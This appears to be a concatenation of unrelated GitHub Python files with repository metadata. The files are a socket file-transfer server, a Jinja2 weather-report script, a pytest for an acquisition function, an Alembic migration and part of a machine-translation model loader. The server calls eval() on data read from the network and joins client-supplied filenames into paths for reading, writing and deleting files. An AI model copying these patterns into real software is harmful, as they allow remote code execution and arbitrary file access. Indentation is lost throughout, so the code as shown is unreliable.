server.send(convertToSIZE(msg))
while True:
msg = server.recv(SIZE)
if not msg:
continue
else:
msg = removeExtraBytes(msg).decode(FORMAT)
cmd, msg = msg.split("%")
if cmd == "DOWNLOAD":
filename = msg
filepath = os.path.join(folderpath, filename)
packetCount = getPacketCount(filepath)
fileData = f'["{filename}", "{packetCount}"]'
msgSend = f"TAKE_DATA%{fileData}"
server.send(convertToSIZE(msgSend))
with open(filepath, "rb") as f:
while packetCount > 0:
data = f.read(SIZE)
server.send(data)
packetCount -= 1
serverLogs.append(f"[DOWNLOADED]: {filename} downloaded by {addr}")
serverLogsVar.set(str(serverLogs))
elif cmd == "UPLOAD":
filename = msg
filepath = os.path.join(folderpath, filename).replace("\\", "/")
packetCountResponse = eval(
removeExtraBytes(server.recv(SIZE)).decode(FORMAT)
)
with open(filepath, "wb") as f:
while packetCountResponse > 0:
data = server.recv(SIZE)
f.write(data)
packetCountResponse -= 1
connFlag[0] = True
serverLogs.append(f"[UPLOADED]: {filename} uploaded by {addr}")
serverLogsVar.set(str(serverLogs))
elif cmd == "DELETE":
filename = msg
filepath = os.path.join(folderpath, filename).replace("\\", "/")
os.remove(filepath)
connFlag[0] = True
serverLogs.append(f"[DELETED]: {filename} deleted by {addr}")
serverLogsVar.set(str(serverLogs))
def shutDownServerButton():
frame.destroy()
main_window()
serverThread = threading.Thread(target=serverHandler)
serverThread.start()
lb1 = ctk.CTkLabel(
frame,
text="SERVER LOGS",
font=("Comic Sans MS bold", 20),
padx=5,
pady=5,
)
lb1.pack()
lb2 = ctk.CTkLabel(
frame,
text=f"Share this code to join: {IP}",
font=("Comic Sans MS bold", 18),
padx=5,
pady=5,
)
lb2.place(x=10, y=50)
lb3 = ctk.CTkLabel(
frame,
textvariable=devicesConnectedVar,
font=("Comic Sans MS bold", 18),
padx=5,
pady=5,
)
lb3.place(x=790, y=50)
listbox1 = CTkListbox(frame, listvariable=serverLogsVar, height=400, width=950)
listbox1.place(x=10, y=100)
btn1 = ctk.CTkButton(frame, text="Shut Down Server", command=shutDownServerButton)
btn1.place(x=450, y=550)
| Aryan51203/File-Transfer | hostServer.py | hostServer.py | py | 5,609 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "socket.gethostbyname",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "socket.gethostname",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "socket.socket",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "socket.AF_INET"... |
23096307798 | from jinja2 import Template
f = open('weather.log', 'r')
w = f.readlines()
f.close()
weather = []
for i in w:
weather.append(i[:25].strip().split())
#print(weather)
html = open('weth.txt').read()
template = Template(html)
render = template.render(weather = weather)
f = open('weather.html', 'w')
f.write(render)
f.close()
| AnnPython/-jinja | weth1.py | weth1.py | py | 360 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "jinja2.Template",
"line_number": 13,
"usage_type": "call"
}
] |
26807889190 | import os
import sys
import numpy as np
import pytest
from numpy.random import normal
sys.path.append(os.path.join(os.path.dirname(__file__), "../.."))
module = __import__("Acquisition", fromlist=["EI"])
class TestEI:
@pytest.mark.parametrize(
("mean", "var", "base"),
[(0.0, 1.0, 0.5), (0.8, 0.1, 0.3), (0.1, 1.3, 0.7), (0.4, 0.1, 0.3),],
)
def test_f(self, mean, var, base) -> float:
# 厳密解
AF = module.EI.EI()
ei = AF.f(mean, var, base)
# 近似解(モンテカルロ積分)
sum = 0.0
size = 100000
for x in normal(mean, var, size):
sum += np.max([base - x, 0.0])
sum /= size
print(sum, ei)
# 差分
dif = np.abs(sum - ei)
assert dif < 0.1
| mit17024317/2020-0730 | Optimizer/Search/Acquisition/test/test_EI.py | test_EI.py | py | 790 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
17360305125 | """empty message
Revision ID: d21d3839c096
Revises: 0c6b29c57638
Create Date: 2020-01-08 12:54:10.048577
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd21d3839c096'
down_revision = '0c6b29c57638'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('word_classification',
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('word_classification', sa.String(length=4), nullable=False),
sa.Column('word', sa.String(length=1024), nullable=False),
sa.Column('last_name_used', sa.String(length=1024), nullable=True),
sa.Column('last_prep_name', sa.String(length=1024), nullable=True),
sa.Column('frequency', sa.BIGINT(), nullable=True),
sa.Column('approved_by', sa.Integer(), nullable=True),
sa.Column('approved_dt', sa.DateTime(timezone=True), nullable=True),
sa.Column('start_dt', sa.DateTime(timezone=True), nullable=True),
sa.Column('end_dt', sa.DateTime(timezone=True), nullable=True),
sa.Column('last_updated_by', sa.Integer(), nullable=True),
sa.Column('last_update_dt', sa.DateTime(timezone=True), nullable=True),
sa.ForeignKeyConstraint(['approved_by'], ['users.id'], ),
sa.ForeignKeyConstraint(['last_updated_by'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_word_classification_word'), 'word_classification', ['word'], unique=False)
op.create_index(op.f('ix_word_classification_word_classification'), 'word_classification', ['word_classification'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_word_classification_word_classification'), table_name='word_classification')
op.drop_index(op.f('ix_word_classification_word'), table_name='word_classification')
op.drop_table('word_classification')
# ### end Alembic commands ###
| bcgov/namex | api/migrations/versions/d21d3839c096_.py | d21d3839c096_.py | py | 2,035 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "alembic.op.create_table",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Integ... |
14149292573 | import sys
sys.path.insert(0,'python')
from geo_trans import *
import numpy as np
from scipy.interpolate import griddata
from fast_rw import *
def get_coords(h,v):
mgrss = get_lon_lat(27, 5).ravel()
mgrss = np.array([(i[:5],i[-8:-4],i[-4:]) for i in mgrss]).reshape(2400,2400,3)
index = np.where(mgrss[:,:,0]=='50SMG')
Scoords = [9999-mgrss[index[0], index[1],2].astype('int'), mgrss[index[0], index[1],1].astype('int')]
return index, Scoords
h=27; v=5
Rs = np.arange(2400*2400).reshape(2400,2400)
grid_x, grid_y = np.mgrid[0:10980, 0:10980]
index, Scoords = get_coords(h,v)
values = Rs[index[0],index[1]]
std_int_sent = griddata(np.array(zip(Scoords[0],Scoords[1])), values, (grid_x, grid_y), method='nearest')
parallel_rw_pkl(std_int_sent, 'std_int_sent%i', 'w')
| MarcYin/S2_MODIS | scripts/standard_mask.py | standard_mask.py | py | 792 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "sys.path.insert",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.where",
"line_numbe... |
53079157 | __author__ = 'James DeVincentis <james.d@hexhost.net>'
import os
import multiprocessing
import time
import schedule
import setproctitle
import cif
class Feeder(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.backend = None
self.logging = cif.logging.getLogger('FEEDER')
self.logging.info("Loading Feeds")
self.load_feeds()
def load_feeds(self):
schedule.clear()
feeds = {}
self.logging.debug("Getting List of Feeds")
files = os.listdir(cif.options.feed_directory)
feed_files = []
for file in files:
if file.endswith(".yml"):
self.logging.debug("Found Feed File: {0}".format(file))
feed_files.append(os.path.join(cif.options.feed_directory, file))
feed_files.sort()
for feed_file in feed_files:
self.logging.info("Loading Feed File: {0}".format(feed_file))
feeds[feed_file] = cif.feeder.Feed(feed_file)
self.logging.info("Scheduling Feed File: {0}".format(feed_file))
if 'feeds' not in feeds[feed_file].feed_config:
self.logging.info("{0} does not contain feeds key".format(feed_file))
continue
for feed_name in feeds[feed_file].feed_config['feeds'].keys():
if "interval" in feeds[feed_file].feed_config['feeds'][feed_name]:
if feeds[feed_file].feed_config['feeds'][feed_name]['interval'] == "hourly":
self.logging.info(repr(schedule.every().hour.at("00:00").do(feeds[feed_file].process, feed_name)))
elif feeds[feed_file].feed_config['feeds'][feed_name]['interval'] == "daily":
self.logging.info(repr(schedule.every().day.at("00:00").do(feeds[feed_file].process, feed_name)))
elif feeds[feed_file].feed_config['feeds'][feed_name]['interval'] == "weekly":
self.logging.info(repr(schedule.every().day.at("00:00").do(feeds[feed_file].process, feed_name)))
else:
self.logging.info(repr(schedule.every(1).minute.do(feeds[feed_file].process, feed_name)))
def run(self):
try:
setproctitle.setproctitle('[CIF-SERVER] - Feeder')
except:
pass
while True:
try:
schedule.run_pending()
time.sleep(1)
except Exception as e:
self.logging.error("Schedule dead, restarting")
continue
| Danko90/cifpy3 | lib/cif/feeder/feeder.py | feeder.py | py | 2,614 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "multiprocessing.Process",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "multiprocessing.Process.__init__",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Process",
"line_number": 15,
"usage_type": "attribute"
},... |
5863215541 | from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.share_credential import ShareCredential
from ..types import UNSET, Unset
T = TypeVar("T", bound="ModifyRepositoryProfileRequest")
@attr.s(auto_attribs=True)
class ModifyRepositoryProfileRequest:
"""Model having repository details
Attributes:
profile_name (Union[Unset, str]): name of the repository profile
description (Union[Unset, str]):
share_path (Union[Unset, str]): Provide the share path of catalog
modified_by (Union[Unset, str]): Provide the modifiedby user
share_credential (Union[Unset, ShareCredential]): Share credential details
"""
profile_name: Union[Unset, str] = UNSET
description: Union[Unset, str] = UNSET
share_path: Union[Unset, str] = UNSET
modified_by: Union[Unset, str] = UNSET
share_credential: Union[Unset, ShareCredential] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
profile_name = self.profile_name
description = self.description
share_path = self.share_path
modified_by = self.modified_by
share_credential: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.share_credential, Unset):
share_credential = self.share_credential.to_dict()
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({})
if profile_name is not UNSET:
field_dict["profileName"] = profile_name
if description is not UNSET:
field_dict["description"] = description
if share_path is not UNSET:
field_dict["sharePath"] = share_path
if modified_by is not UNSET:
field_dict["modifiedBy"] = modified_by
if share_credential is not UNSET:
field_dict["shareCredential"] = share_credential
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
profile_name = d.pop("profileName", UNSET)
description = d.pop("description", UNSET)
share_path = d.pop("sharePath", UNSET)
modified_by = d.pop("modifiedBy", UNSET)
_share_credential = d.pop("shareCredential", UNSET)
share_credential: Union[Unset, ShareCredential]
if isinstance(_share_credential, Unset):
share_credential = UNSET
else:
share_credential = ShareCredential.from_dict(_share_credential)
modify_repository_profile_request = cls(
profile_name=profile_name,
description=description,
share_path=share_path,
modified_by=modified_by,
share_credential=share_credential,
)
modify_repository_profile_request.additional_properties = d
return modify_repository_profile_request
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
| dell/omivv | Python/omevv/v1/omevv_apis_client/models/modify_repository_profile_request.py | modify_repository_profile_request.py | py | 3,461 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "typing.TypeVar",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "typing.Union",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "types.Unset",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "types.UNSET",
"line_number... |
11572477017 | from collections import deque
idx = 1
while True:
N = int(input())
if N == 0:
exit()
arr = [list(map(int, input().split())) for _ in range(N)]
cost = [[999]*N for _ in range(N)]
visited = [[False]*N for _ in range(N)]
q = deque([[0,0]])
cost[0][0] = arr[0][0]
dx = [-1, 1, 0, 0] # 상하좌우
dy = [0, 0, -1, 1]
while q:
x, y = q.popleft()
visited[0][0] = True
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if 0 <= nx < N and 0 <= ny < N and not visited[nx][ny]:
if cost[nx][ny] > cost[x][y] + arr[nx][ny]:
cost[nx][ny] = cost[x][y] + arr[nx][ny]
q.append([nx,ny])
print(f'Problem {idx}: {cost[N-1][N-1]}')
idx += 1 | hyojeong00/BOJ | boj4485.py | boj4485.py | py | 796 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.deque",
"line_number": 13,
"usage_type": "call"
}
] |
805703677 | import pyaudio
import numpy as np
import math
import struct
import simpleaudio as sa
from imutils.video import FPS
#CHUNK = 1024
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 0.03
print(int(RATE / CHUNK * RECORD_SECONDS))
volume = 0.1 # range [0.0, 1.0]
fs = 44100 # sampling rate, Hz, must be integer
duration = 0.3 # in seconds, may be float
f = 750.0 # sine frequency, Hz, may be float
fps = FPS().start()
def rms(data):
if data != []:
count = len(data)/2
format = "%dh"%(count)
shorts = struct.unpack(format, data)
sum_squares = 0.0
for sample in shorts:
n = sample * (1.0/32768)
sum_squares += n*n
return math.sqrt(sum_squares / count)
return 0
p = pyaudio.PyAudio()
p2 = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
# for paFloat32 sample values must be in range [-1.0, 1.0]
streamout = p2.open(format=pyaudio.paFloat32,
channels=1,
rate=fs,
output=True)
# generate samples, note conversion to float32 array
samples = (np.sin(2*np.pi*np.arange(fs*duration)*f/fs)).astype(np.float32)
wave_obj = sa.WaveObject.from_wave_file("bumbo.wav")
ind = 0
count = 0
while ind != 500:
frames = []
energy = []
for _ in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
try:
data = stream.read(CHUNK, exception_on_overflow=False)
except IOError:
#data = '\x00' * CHUNK
data = []
energy.append(rms(data))
if np.mean(energy) > 0.01 and count > 10:
#wave_obj.play()
streamout.get_write_available()
#streamout.write(samples * np.mean(energy)/0.2)
streamout.write(samples * (volume + np.mean(energy) * 5))
print(np.mean(energy))
# energy = 0.02 - volume = 0.1
# energy = 0.2 - volume = 1
count = 0
else:
count = count + 1
ind = ind + 1
fps.update()
# stop the timer and display FPS information
fps.stop()
print("[INFO] elapsed time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
#energy = np.mean(energy)
#print("Average energy in an execution of " + str(RECORD_SECONDS*ind) + " Seconds: " + str(energy))
stream.stop_stream()
stream.close()
streamout.stop_stream()
streamout.close()
p.terminate()
p2.terminate()
| matheusbitaraes/VirtualDrum | hearaudio.py | hearaudio.py | py | 2,534 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pyaudio.paInt16",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "imutils.video.FPS",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "struct.unpack",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
... |
11548425803 | import hashlib
import time
import utils
import asyncpg
import asyncpg.exceptions as asyncpg_exc
from config import logger
from aiohttp import web
from db_wrapper import DbWrapper
router = web.RouteTableDef()
@router.post('/sign_in')
async def sign_in(request: web.Request):
body = await request.json()
email: str = body.get('email')
password: str = body.get('password')
hash = hashlib.sha256(password.encode('UTF-8')).hexdigest()
user_data = await DbWrapper().get_user_data_by_email(email)
if not user_data:
return web.json_response(utils.generate_response(0, 'No account with such email'), status=403)
if not hash == user_data['hash']:
return web.json_response(utils.generate_response(0, 'Incorrect password'), status=403)
# TODO send token
response = utils.generate_response(1, 'Authorization_successful')
token = await DbWrapper().get_token( user_data['user_id'])
response['data'].update({'token': token['tkn'], 'timestamp': token['timestamp'], 'lifetime': token['lifetime']})
return web.json_response(response, status=200)
@router.post('/sign_up')
async def sign_up(request: web.Request):
body = await request.json()
firstname: str = body.get('firstname')
lastname: str = body.get('lastname')
mail: str = body.get('email')
password: str = body.get('password')
pw_hash = hashlib.sha256(password.encode('utf-8')).hexdigest()
try:
user_by_email = await DbWrapper().get_user_data_by_email(mail)
if user_by_email:
return web.json_response(utils.generate_response(0, 'Account already exists'))
user_insert_result = await DbWrapper().insert_user(firstname=firstname, lastname=lastname, email=mail, password_hash=pw_hash, timestamp=int(time.time()))
# this is here because sometimes it's possible for two identical requests happening at the same time
# causing an error due to none being inserted, as insert_user returns none because in another instance of this
# handler being run it has already been added
if user_insert_result:
token = utils.generate_token()
await DbWrapper().insert_token(user_insert_result, token, int(time.time()), 0)
return web.json_response(utils.generate_response(1, 'Account created successfully'))
else:
return web.json_response(utils.generate_response(0, 'Account already exists'))
except Exception as e:
logger.warning(f'[Route Handlers] {e}, lineno:{e.__traceback__.tb_lineno}')
# this will send a 500 response code
raise
@router.get('/sessions')
async def all_sessions(request: web.Request):
result = await DbWrapper().get_all_sessions()
response = utils.generate_response(1, 'Session list returned')
response['data'].update({'sessions':[]})
for session in result:
specializations = await DbWrapper().get_instructor_specs(session['instructor_id'])
response['data']['sessions'].append({
'session_id': session['session_id'],
'session_start': session['session_start'],
'session_place': session['session_place'],
'session_name': session['session_name'],
'capacity': session['capacity'],
'signed_up': session['signed_up'],
'firstname': session['firstname'],
'lastname': session['lastname'],
'specialization': [record['spec_name'] for record in specializations]
})
return web.json_response(response, status=200)
@router.post('/sign_up_for_session')
async def sign_for_session(request:web.Request):
body = await request.json()
session_id = body.get('session_id')
uid = request.headers.get('X-User-Id')
try:
await DbWrapper().sign_up_for_session(user_id=uid, session_id=session_id)
except asyncpg_exc.UniqueViolationError as e:
return web.json_response(utils.generate_response(0, 'Double signup attempt'), status=400)
except Exception as e:
return web.json_response(utils.generate_response(0, f'Something went wrong. {e}'), status=500)
return web.json_response(utils.generate_response(1, 'Success'), status=200)
@router.post('/unsign_from_session')
async def unsign_for_session(request: web.Request):
body = await request.json()
session_id = int(body.get('session_id'))
uid = request.headers['X-User-Id']
await DbWrapper().unsign_from_session(session_id = session_id, user_id=uid)
return web.Response(status=200)
@router.get('/instructors')
async def get_instructors(request: web.Request):
result = await DbWrapper().get_instructors()
response = utils.generate_response(1, 'Instructor list returned')
response['data'].update({'instructors': []})
for instructor in result:
response['data']['instructors'].append({
'firstname': instructor['firstname'],
'lastname': instructor['lastname'],
'info': instructor['info'],
'spec': instructor['spec_name']
})
return web.json_response(response, status=200)
@router.post('/sessions_by_uid')
async def get_sessions_by_uid(request: web.Request):
body = await request.json()
uid = int(request.headers['X-User-Id'])
result = await DbWrapper().get_sessions_by_user(uid)
response = utils.generate_response(1, 'Session list returned')
response['data'].update({'sessions': []})
for session in result:
specializations = await DbWrapper().get_instructor_specs(session['instructor_id'])
response['data']['sessions'].append({
'session_id': session['session_id'],
'session_start': session['session_start'],
'session_place': session['session_place'],
'session_name': session['session_name'],
'capacity': session['capacity'],
'signed_up': session['signed_up'],
'firstname': session['firstname'],
'lastname': session['lastname'],
'specialization': [record['spec_name'] for record in specializations]
})
return web.json_response(response, status=200)
@router.get('/get_notifications_by_uid')
async def get_notifications_by_uid(request: web.Request):
uid = request.headers['X-User-Id']
notifications = await DbWrapper().get_notifications_by_user_id(uid)
data = []
for notification in notifications:
new_notification = {
'notification_id': notification['notification_id'],
'text': notification['text']
}
data.append(notification_data)
response = generate_response(1, 'Success')
response['data'] = data
return web.json_response(data, status=200)
@router.delete('/delete_notification_link')
async def soft_delete_notification_link(request: web.Request):
body = await request.json()
user_id = request.headers['user_id']
notification_id = body['notification_id']
try:
await DbWrapper().unbind_notification(int(user_id), int(notification_id))
except Exception as e:
logger.exception('Exception during delete_notification_link:')
response = utils.generate_response(0, 'Failed to delete notification link')
return web.Response(response, status=500)
return web.Response(response, status=200)
@router.get('/ping')
async def ping(request: web.Request):
return web.Response(body='pong')
| ilookhandsometoday/dance-studio-backend | src/routes.py | routes.py | py | 7,394 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "aiohttp.web.RouteTableDef",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "aiohttp.web",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "aiohttp.web.Request",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "aiohtt... |
36924785517 | from beewin_module.database.beewinDB import Member, Result
from beewin_module.models.dataClass import MemberData
from flask_restful import Resource, request, output_json
from common.argsParser import uid_parser, member_parser
class MemberResource(Resource):
def get(self, uid):
if uid == 'all':
res: Result = Member.MemberLength()
return res.to_dict()
else:
res: Result = Member.read(uid)
return res.to_dict()
def post(self):
arg = member_parser.parse_args()
_member = MemberData.from_dict(arg)
res: Result = Member.create(_member.uid, _member)
return res.to_dict()
def put(self):
arg = member_parser.parse_args()
_member = MemberData.from_dict(arg)
res: Result = Member.update(_member.uid, _member)
return res.to_dict()
def delete(self):
arg = uid_parser.parse_args()
res: Result = Member.delete(arg['uid'])
return res.to_dict()
if __name__ == '__main__':
pass
| Yicheng-1218/web_module | beewin_api/resource/MemberResource.py | MemberResource.py | py | 1,043 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask_restful.Resource",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "beewin_module.database.beewinDB.Result",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "beewin_module.database.beewinDB.Member.MemberLength",
"line_number": 11,
"us... |
41060932108 | import pytest
import sacrebleu
EPSILON = 1e-4
test_sentence_level_chrf = [
(
'Co nás nejvíc trápí, protože lékaři si vybírají, kdo bude žít a kdo zemře.',
['Nejvíce smutní jsme z toho, že musíme rozhodovat o tom, kdo bude žít a kdo zemře.'],
39.14078509,
),
(
'Nebo prostě nemají vybavení, které by jim pomohlo, uvedli lékaři.',
['A někdy nemáme ani potřebný materiál, abychom jim pomohli, popsali lékaři.'],
31.22557079,
),
(
'Lapali po dechu, jejich životy skončily dřív, než skutečně začaly.',
['Lapali po dechu a pak jejich život skončil - dřív, než skutečně mohl začít, připomněli.'],
57.15704367,
),
]
# hypothesis, reference, expected score
# >= 2.0.0: some orders are not fulfilled in epsilon smoothing (chrF++.py and NLTK)
test_cases = [
(["abcdefg"], ["hijklmnop"], 0.0),
(["a"], ["b"], 0.0),
([""], ["b"], 0.0),
([""], ["ref"], 0.0),
([""], ["reference"], 0.0),
(["aa"], ["ab"], 8.3333),
(["a", "b"], ["a", "c"], 8.3333),
(["a"], ["a"], 16.6667),
(["a b c"], ["a b c"], 50.0),
(["a b c"], ["abc"], 50.0),
([" risk assessment must be made of those who are qualified and expertise in the sector - these are the scientists ."],
["risk assessment has to be undertaken by those who are qualified and expert in that area - that is the scientists ."], 63.361730),
([" Die Beziehung zwischen Obama und Netanjahu ist nicht gerade freundlich. "],
["Das Verhältnis zwischen Obama und Netanyahu ist nicht gerade freundschaftlich."], 64.1302698),
(["Niemand hat die Absicht, eine Mauer zu errichten"], ["Niemand hat die Absicht, eine Mauer zu errichten"], 100.0),
]
# sacreBLEU < 2.0.0 mode
# hypothesis, reference, expected score
test_cases_effective_order = [
(["a"], ["a"], 100.0),
([""], ["reference"], 0.0),
(["a b c"], ["a b c"], 100.0),
(["a b c"], ["abc"], 100.0),
([""], ["c"], 0.0),
(["a", "b"], ["a", "c"], 50.0),
(["aa"], ["ab"], 25.0),
]
test_cases_keep_whitespace = [
(
["Die Beziehung zwischen Obama und Netanjahu ist nicht gerade freundlich."],
["Das Verhältnis zwischen Obama und Netanyahu ist nicht gerade freundschaftlich."],
67.3481606,
),
(
["risk assessment must be made of those who are qualified and expertise in the sector - these are the scientists ."],
["risk assessment has to be undertaken by those who are qualified and expert in that area - that is the scientists ."],
65.2414427,
),
]
@pytest.mark.parametrize("hypotheses, references, expected_score", test_cases)
def test_chrf(hypotheses, references, expected_score):
score = sacrebleu.corpus_chrf(
hypotheses, [references], char_order=6, word_order=0, beta=3,
eps_smoothing=True).score
assert abs(score - expected_score) < EPSILON
@pytest.mark.parametrize("hypotheses, references, expected_score", test_cases_effective_order)
def test_chrf_eff_order(hypotheses, references, expected_score):
score = sacrebleu.corpus_chrf(
hypotheses, [references], char_order=6, word_order=0, beta=3,
eps_smoothing=False).score
assert abs(score - expected_score) < EPSILON
@pytest.mark.parametrize("hypotheses, references, expected_score", test_cases_keep_whitespace)
def test_chrf_keep_whitespace(hypotheses, references, expected_score):
score = sacrebleu.corpus_chrf(
hypotheses, [references], char_order=6, word_order=0, beta=3,
remove_whitespace=False).score
assert abs(score - expected_score) < EPSILON
@pytest.mark.parametrize("hypothesis, references, expected_score", test_sentence_level_chrf)
def test_chrf_sentence_level(hypothesis, references, expected_score):
score = sacrebleu.sentence_chrf(hypothesis, references, eps_smoothing=True).score
assert abs(score - expected_score) < EPSILON
| mjpost/sacrebleu | test/test_chrf.py | test_chrf.py | py | 3,965 | python | en | code | 896 | github-code | 1 | [
{
"api_name": "sacrebleu.corpus_chrf",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 71,
"usage_type": "attribute"
},
{
"api_name": "sacreb... |
27768711368 | import numpy as np
import itertools
import multiprocessing
import threading
import subprocess
import time
import sys
import os
if len(sys.argv) != 3:
print("input data_folder thread_num")
exit(0)
folder = sys.argv[1]
max_spawn = int(sys.argv[2])
if not os.path.exists(folder):
os.mkdir(folder)
os.chdir(folder)
if os.name == "nt":
proc = "../bin/throughput.exe"
else:
proc = "../bin/throughput.out"
task_list = []
width = [7]
n_inst = [10000]
trial = [10]
ano_prob = [0] + list(np.logspace(-6,-4, 20))
ano_life = [100, 1000]
task_list = itertools.product(width, n_inst, trial, ano_prob, ano_life)
task_list = list(task_list)
task_list = [list(map(str, val)) for val in task_list]
print(task_list)
task_list = task_list * 1000
print("max_spawn = ", max_spawn)
task_lock = threading.Lock()
task_index = 0
def spawn_and_wait(thread_id):
global task_list
global task_lock
global task_index
while True:
finish_flag = False
my_task_index = 0
task_lock.acquire()
try:
if task_index == len(task_list):
finish_flag = True
else:
my_task_index = task_index
task_index += 1
finally:
task_lock.release()
if finish_flag:
print("thread{:2} exits".format(thread_id))
break
else:
fname = "result{}.txt".format(thread_id)
arg = [proc, fname] + task_list[my_task_index]
print(arg)
process = subprocess.Popen(arg)
# process = subprocess.Popen(arg, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
start = time.time()
print("thread{:2} : start task {}: {}".format(thread_id, my_task_index, arg))
process.wait()
elapsed = time.time() - start
print("thread{:2} : finish task {}: elp:{}".format(thread_id, my_task_index, elapsed))
thread_pool = []
for ind in range(max_spawn):
thread = threading.Thread(target=spawn_and_wait, args=[ind])
thread_pool.append(thread)
for thread in thread_pool:
thread.start()
for thread in thread_pool:
thread.join()
| kodack64/Q3DE | fig10_q3de_throughput/micro_spawn.py | micro_spawn.py | py | 2,178 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "sys.argv",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_... |
10663386137 | import os, yaml, logging, re
# external imports
import torch
from joeynmt.helpers import load_config
from subword_nmt import apply_bpe
from subword_nmt import apply_bpe
from sacremoses import MosesTokenizer, MosesDetokenizer
from joeynmt.helpers import load_config, get_latest_checkpoint, \
load_checkpoint
from joeynmt.vocabulary import build_vocab
from joeynmt.model import build_model
from joeynmt.prediction import validate_on_data
from urllib.request import urlopen
from io import BytesIO
from zipfile import ZipFile
# internal imports
from core.utils import load_line_as_data
class MasakhaneModelLoader():
"""User Defined Class to manage the download of machine trasnlation models"""
def __init__(self, available_models_file):
# model directory to store the modeks
self._model_dir_prefix = os.environ.get('MODEL',
"./models/joeynmt/")
self._src_language = ''
#load availiable models into memory
self.models = self.load_available_models(available_models_file)
def load_available_models(self, available_models_file):
"""Load a dictonary with available models to download"""
models = {}
with open(available_models_file, 'r') as ofile:
# iterate over file entries
for i, line in enumerate(ofile):
entries = line.strip().split("\t")
# extract headers
if i == 0:
header_keys = [h.__str__() for h in entries]
continue
# build available model dictionary from the headers & entries:
# https://www.geeksforgeeks.org/python-dictionary-comprehension/
model = {key:value for key,value in zip(header_keys, entries)}
# don't add incomplete models
if model['complete'] != 'yes':
continue
models[f"{model['src_language']}-{model['tgt_language']}-{model['domain']}"] = model
print('Found {} Masakhane models.'.format(len(models)))
return models
def download_model(self, src_language, tgt_language, domain):
""" Download model for given trg language. """
model_dir = f"{self._model_dir_prefix}{src_language}-{tgt_language}-{domain}"
if not os.path.exists(model_dir):
os.system(f'mkdir -p {model_dir}')
model_files = self.models[f"{src_language}-{tgt_language}-{domain}"]
# Check if files exist
ckpt_path = os.path.join(model_dir, 'model.ckpt')
src_vocab_path = os.path.join(model_dir, 'src_vocab.txt')
trg_vocab_path = os.path.join(model_dir, 'trg_vocab.txt')
config_path = os.path.join(model_dir, 'config_orig.yaml')
